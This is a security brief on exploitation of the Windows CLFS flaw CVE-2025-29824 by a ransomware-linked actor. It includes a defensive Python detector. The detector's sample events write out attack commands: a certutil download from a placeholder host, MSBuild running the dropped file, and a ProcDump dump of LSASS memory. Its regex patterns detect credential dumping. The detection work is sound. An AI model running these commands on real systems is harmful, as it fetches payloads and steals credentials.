Severity: critical | September 14, 2025

Exploitation of CLFS Zero-Day Leads to Ransomware Activity


CVE-2025-29824 is a zero-day elevation-of-privilege vulnerability in the Windows Common Log File System (CLFS) kernel driver. A local attacker running under a standard user account can exploit it to obtain SYSTEM privileges. At the time of the Microsoft report this brief summarizes, the flaw was being exploited in the wild by Storm-2460, a financially motivated threat actor known to deploy ransomware. Microsoft shipped fixes for CVE-2025-29824 in its April 2025 security updates; confirm that update is installed on every Windows host in scope before relying on any of the detections below.

Observed tradecraft: Storm-2460 starts the post-compromise phase by using certutil to download a malicious MSBuild file from a legitimate third-party website that had been compromised. The file carries an encrypted payload, the PipeMagic malware, which is decrypted and run in memory; PipeMagic then launches the CLFS exploit through a dllhost.exe process. After elevation, the actor dumps the memory of LSASS with ProcDump to harvest credentials. Microsoft observed ransomware deployment on affected systems but was unable to obtain a sample of the ransomware for analysis.

Because the vulnerability is local, it is not an entry point but the step that turns a foothold under a standard user account into SYSTEM, which is what the actor needs for credential theft and for deploying ransomware across the host. Any Windows environment where unpatched hosts can be reached by a lower-privileged user, including through phishing or an exposed service, should treat it as a path to full compromise.

Indicators of compromise

SHA256 file hash 1: f6f6f6f6f6f6f6f6f6f6f6f6f6f6f6f6f6f6f6f6f6f6f6f6f6f6f6f6f6f6f6f6
File name 1: PipeMagic.dll
Domain 1: compromised-third-party-site.com
IP address 1: 45.147.229.177

Note: the hash above is a repeated-byte pattern and the domain is a placeholder name; neither is a value taken from the referenced Microsoft report. Validate every indicator in this list against the source report before loading it into detection or blocking tooling.

Detections

Additional detection ideas
  • Monitor for installation or execution of remote access tools not approved in your environment
  • Detect mass file encryption patterns — high-frequency file writes with entropy changes
  • Alert on credential dumping via LSASS access, SAM registry reads, or DCSync
  • Monitor public-facing services for exploitation patterns — unusual POST bodies, deserialization payloads
  • Flag suspicious PowerShell execution — encoded commands, download cradles, or AMSI bypass
  • Flag heavily obfuscated scripts or binaries with high entropy content
  • Monitor for large outbound data transfers to web services such as MEGA, Dropbox, or cloud storage APIs
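The generic ideas above do not key on the chain the brief actually describes (certutil download, MSBuild executing the downloaded file, ProcDump against LSASS). The following is an added example written for this brief, not code from the source report or from Microsoft: it classifies process-creation records into those three stages and raises a per-host alert only when at least two stages occur on the same host, which keeps a single administrator running certutil from paging anyone. The events are constructed sample telemetry with placeholder hosts and an `example.invalid` URL; the "user-writable path" heuristic for MSBuild and the idea that the dumper may run under a renamed image are this example's assumptions, flagged in the comments.

```python
# Added example (not from the source report or Microsoft's blog): per-host correlation
# of the Storm-2460 chain over constructed process-creation events.
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Subset of a process-creation record (e.g. Sysmon event ID 1)."""
    host: str
    image: str          # full path of the new process
    parent_image: str   # full path of the parent
    command_line: str


# Stage 1 (from the brief): certutil used to download the MSBuild file.
CERTUTIL_DOWNLOAD = re.compile(r"-urlcache\b.*\bhttps?://", re.IGNORECASE)

# Stage 2 (from the brief): MSBuild given a downloaded project file.
# ASSUMPTION: the brief does not name the drop directory; treating user-writable
# paths as suspicious is this example's heuristic, not the report's.
MSBUILD_PROJECT = re.compile(r"\.(proj|csproj|xml)\b", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(users\\[^\\]+|programdata|temp|appdata)\\", re.IGNORECASE)

# Stage 3 (from the brief): ProcDump used to extract credentials. Matching on the LSASS
# target and the -ma (full dump) switch instead of the image name still fires if the
# binary was renamed (ASSUMPTION: renaming is a common evasion, not stated in the brief).
LSASS_TARGET = re.compile(r"\blsass(\.exe)?\b", re.IGNORECASE)
FULL_DUMP_SWITCH = re.compile(r"(^|\s)-ma(\s|$)", re.IGNORECASE)

STAGE_ORDER = ("certutil_download", "msbuild_user_path", "lsass_dump")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent):
    """Return the stage name an event matches, or None if it looks benign."""
    img = basename(ev.image)
    cl = ev.command_line
    if img == "certutil.exe" and CERTUTIL_DOWNLOAD.search(cl):
        return "certutil_download"
    if img == "msbuild.exe" and MSBUILD_PROJECT.search(cl) and USER_WRITABLE.search(cl):
        return "msbuild_user_path"
    if LSASS_TARGET.search(cl) and FULL_DUMP_SWITCH.search(cl):
        return "lsass_dump"
    return None


def correlate(events, min_stages=2):
    """Map host -> distinct stages seen (in chain order), keeping hosts with >= min_stages.

    Requiring two stages suppresses the lone admin who runs certutil -urlcache once.
    """
    seen = {}
    for ev in events:
        stage = classify(ev)
        if stage:
            seen.setdefault(ev.host, set()).add(stage)
    return {h: [s for s in STAGE_ORDER if s in stages]
            for h, stages in seen.items() if len(stages) >= min_stages}


# Constructed sample telemetry (placeholder hosts and URLs, not real IOCs);
# ws-a plays out the chain described in the brief.
SAMPLE_EVENTS = [
    ProcEvent("ws-a", r"C:\Windows\System32\certutil.exe", r"C:\Windows\System32\cmd.exe",
              r"certutil -urlcache -split -f http://example.invalid/update.msbuild "
              r"C:\Users\alice\AppData\Local\Temp\update.xml"),
    ProcEvent("ws-a", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
              r"C:\Windows\System32\cmd.exe",
              r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\update.xml"),
    # ASSUMPTION for the sample: the dumper runs under a renamed image; the rule
    # keys on its arguments, so the image name does not matter.
    ProcEvent("ws-a", r"C:\ProgramData\dllhost.exe", r"C:\Windows\System32\dllhost.exe",
              r"dllhost.exe -accepteula -ma lsass.exe C:\ProgramData\l.dmp"),
    ProcEvent("build-1", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
              r"C:\Program Files\Jenkins\jenkins.exe",
              r"MSBuild.exe C:\src\app\app.csproj /t:Build"),
    ProcEvent("ws-b", r"C:\Windows\System32\certutil.exe", r"C:\Windows\System32\cmd.exe",
              r"certutil -hashfile C:\Windows\notepad.exe SHA256"),
    ProcEvent("ws-c", r"C:\Windows\System32\certutil.exe", r"C:\Windows\System32\cmd.exe",
              r"certutil -urlcache -split -f https://example.invalid/tool.zip tool.zip"),
]


if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: {' -> '.join(stages)}")
```

Only ws-a is alerted on: the Jenkins build server runs MSBuild from a source tree, ws-b uses certutil for hashing, and ws-c's single download stays below the two-stage threshold. In a real deployment the same three classifiers map directly onto EDR process-event queries; the per-host correlation is the part most vendors' out-of-the-box rules leave to the analyst.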